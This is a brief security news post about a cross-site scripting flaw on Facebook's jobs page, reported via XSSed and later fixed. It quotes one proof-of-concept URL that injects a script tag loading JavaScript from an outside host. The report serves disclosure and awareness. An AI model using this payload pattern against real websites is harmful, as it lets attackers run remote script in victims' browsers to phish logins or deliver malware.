New Cross-Site Scripting Vulnerability Found On Facebook
According to XSSed, Facebook is vulnerable to a cross site scripting flaw that leaves its users at risk from scripting attacks and logins phishing. The security blog has posted a proof of concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third party sites.
Here is a harmless proof of concept, shown at XSSed:
http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.
Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.
At this moment the flaw is still open. Facebook has been already notified of the vulnerability.
Update (May 27): Facebook has fixed this vulnerability a couple of days ago.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.